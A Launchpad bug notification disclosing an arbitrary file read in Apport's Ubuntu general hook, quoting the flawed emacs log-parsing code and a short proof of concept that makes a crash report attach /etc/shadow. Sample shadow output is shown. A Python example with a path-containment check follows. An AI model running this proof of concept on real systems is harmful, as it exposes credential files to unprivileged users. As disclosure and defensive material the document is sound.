** Changed in: apport (Ubuntu)
   Importance: Undecided => Critical

-- 
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1934308

Title:
  Arbitrary file read in general hook (ubuntu.py)

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released

Bug description:
  While reviewing Apport's general hooks it was found that the hook `apport/general-hooks/ubuntu.py` includes user-controlled files when handling `emacs`-related reports:

    if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
        # emacs add-on packages trigger byte compilation, which might fail
        # we are very interested in reading the compilation log to determine
        # where to reassign this report to
        regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
        if attachment in report and re.search(regex, log_file, re.MULTILINE):
            for line in log_file.split('\n'):
                m = re.search(r'^!! and attach the file (\S+)', line)  # [0]
                if m:
                    path = m.group(1)
                    apport.hookutils.attach_file_if_exists(report, path)  # [1]

  After using a regular expression to extract the file to attach [0], the extracted file subsequently gets attached to the report file [1].

  With automatic crash reporting enabled the following PoC (tested on 20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective report file:

    cat << EOF > /var/crash/poc.crash
    ProblemType: Package
    ExecutablePath: /poc
    Package: emacs22
    DpkgTerminalLog:
     !! Byte-compilation for emacs22 failed!
     !! and attach the file /etc/shadow
    EOF

    grep -A5 DpkgTerminal /var/crash/poc.crash
    DpkgTerminalLog:
     !! Byte-compilation for emacs22 failed!
     !! and attach the file /etc/shadow
    .etc.shadow:
     root:!:18393:0:99999:7:::
     daemon:*:18375:0:99999:7:::
     bin:*:18375:0:99999:7:::

  Best regards!
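The pattern described in the report, with a containment check placed in front of the attach step. This is an added example, not code from the report or from Apport, and not the fix that was released. The allowed directory, the helper names and the sample log are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Same pattern the hook uses to pull a path out of the terminal log ([0] above).
ATTACH_RE = re.compile(r'^!! and attach the file (\S+)', re.MULTILINE)


def extract_paths(log_text):
    """Every path named in an 'attach the file' line; all are reporter-controlled."""
    return ATTACH_RE.findall(log_text)


def safe_to_attach(path, allowed_root):
    """Accept only regular files whose resolved location is under allowed_root."""
    root = os.path.realpath(allowed_root)
    real = os.path.realpath(path)  # resolves symlinks and '..' components
    if os.path.commonpath([root, real]) != root:
        return False
    return os.path.isfile(real)


def filter_attachments(log_text, allowed_root):
    """Paths from the log that pass the containment check."""
    return [p for p in extract_paths(log_text) if safe_to_attach(p, allowed_root)]


def _write(path, text):
    with open(path, "w") as handle:
        handle.write(text)


def demo():
    """Constructed sample: one legitimate log, then three paths that must be refused."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "emacs-logs")  # hypothetical allowed directory
        os.mkdir(root)
        good = os.path.join(root, "compile.log")
        _write(good, "byte-compile output\n")
        secret = os.path.join(base, "secret")    # stands in for a protected file
        _write(secret, "x\n")
        link = os.path.join(root, "link.log")
        os.symlink(secret, link)                 # inside root, points outside it
        log = ("!! Byte-compilation for emacs22 failed!\n"
               f"!! and attach the file {good}\n"
               f"!! and attach the file {secret}\n"
               f"!! and attach the file {link}\n"
               f"!! and attach the file {root}/../secret\n")
        return extract_paths(log), filter_attachments(log, root), good
```

A check followed by a later open is still open to a race if the directory is writable by the reporter, so a privileged hook would also need to open the file without following symlinks or read it with the reporting user's privileges.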